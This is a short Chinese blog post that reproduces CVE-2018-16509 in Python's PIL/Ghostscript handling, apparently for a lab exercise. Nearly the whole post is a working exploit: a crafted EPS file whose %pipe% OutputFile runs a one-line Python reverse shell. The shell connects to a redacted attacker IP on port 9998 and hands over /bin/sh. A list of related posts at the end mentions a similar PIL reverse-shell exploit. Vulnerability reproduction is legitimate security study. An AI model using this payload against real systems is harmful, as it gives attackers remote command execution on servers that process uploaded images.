首页 > 编程语言 >[Python]PIL-CVE-2018-16509 复现

[Python]PIL-CVE-2018-16509 复现

时间:2023-11-09 16:37:58浏览次数:47  
标签:PIL socket 16509 Python CVE os

[Python]PIL-CVE-2018-16509 复现

这个问题跟上一个差不多。

exp:

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip****",9998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') currentdevice putdeviceprops

标签:PIL,socket,16509,Python,CVE,os
From: https://www.cnblogs.com/Mz1-rc/p/17822109.html

相关文章

  • pythonDay8
    合集 集合关系运算 去重 集合其他内置方法 文本编辑器 文本编辑器不乱码的核心法则  python3无论如何都不会乱码    python2所有代码前面都加个u,则不会乱码......
  • [Python]PIL-CVE-2017-8291 复现
    [Python]PIL-CVE-2017-8291复现https://github.com/vulhub/vulhub/tree/master/python/PIL-CVE-2017-8291PIL解析eps文件时存在命令注入。可以反弹shellexp:%!PS-Adobe-3.0EPSF-3.0%%BoundingBox:-0-0100100/size_from10000def/size_step500d......
  • Thonny+MicroPython+ESP32开发环境配置以及遇到烧录固件出现error解决方法
    本文主要介绍如何使用python和esp32来做嵌入式研发相关的开发环境搭建以及在搭建时遇到的一些问题一、ESP32板子与电脑通讯1.首先将ESP32的板子通过USB线连接到电脑,下载驱动并且安装https://pan.baidu.com/s/1eTHYnom  2.打开电脑的设备管理器,win10可以直接从搜索中查......
  • 如何系统学习Python?
    学习Python可以通过以下系统性的步骤进行:1.设定学习目标确定你学习Python的主要目的,是为了编写脚本、数据分析、Web开发、机器学习还是其他应用?理解这个目标可以帮助你更有针对性地学习相关内容。2.学习基础知识a.编程基础如果你是编程新手,你可以先学习编程基础知识,......
  • Python进行多线程爬取数据通用模板
    首先,我们需要导入所需的库,包括requests和BeautifulSoup。requests库用于发送HTTP请求,BeautifulSoup库用于解析HTML文档。importrequestsfrombs4importBeautifulSoup然后,我们需要定义一个函数来发送HTTP请求并返回响应。在这个函数中,我们使用requests库的get方法来发送一个GET......
  • 使用Python调用API接口获取淘宝商品数据
    一、引言随着互联网的发展,电子商务已经成为了我们生活中不可或缺的一部分。淘宝作为中国最大的电子商务平台,其商品种类繁多,价格透明,购物方便,深受消费者的喜爱。然而,淘宝的商品数据量庞大,如果我们想要对淘宝的商品进行一些分析,例如商品的价格趋势、销量趋势等,就需要从淘宝的服务器上......
  • 直播app系统源码,python pdf转为图片
    直播app系统源码,pythonpdf转为图片 fromwand.imageimportImageimportos#将pdf文件转为jpg图片文件cur_file_path=os.path.dirname(os.path.realpath(__file__))#path为pdf文件路径path=os.path.join(cur_file_path,os.pardir,'ehouse/resource/img/')image_pdf=......
  • Python中使用sqlalchemy操作数据库遇到密码包含@的处理方法
    欺骗性的oracle12514错误,这就有问题了,努力方向就不对了。。。密码包含@的处理方法使用sqlalchemy操作数据库的时候,遇到密码中包含@的时候会报错。因为它是通过@来链接IP地址的,遇到密码里有@就跟语法里的@混乱分不清了。编辑器就会报错。比如下面这个例子:用户名:XXXXX密码:1......
  • Python多线程爬取数据代码模版
    由于对爬虫Ip信息的理解可能存在偏差,我将假设你想要爬取的网站支持Python多线程运行数据。以下是一个简单的Haskell爬虫程序,用于爬取Python多线程跑数据的内容:importNetwork.HTTPimportNetwork.URIimportData.ListimportData.MaybeimportControl.Monad--爬虫爬虫Ip信息......
  • Python逐行读取文件常用的三种方法!
    在Python中,读取文件是非常普遍的操作,而逐行读取文件则是最常见的需求。那么Python如何逐行读取文件?为大家介绍常用的三种方法,一起来看看吧。1、使用readline()方法逐行读取文件在Python中,我们可以使用readline()方法逐行读取文件。该方法用于读取文件的一行内容,并将文......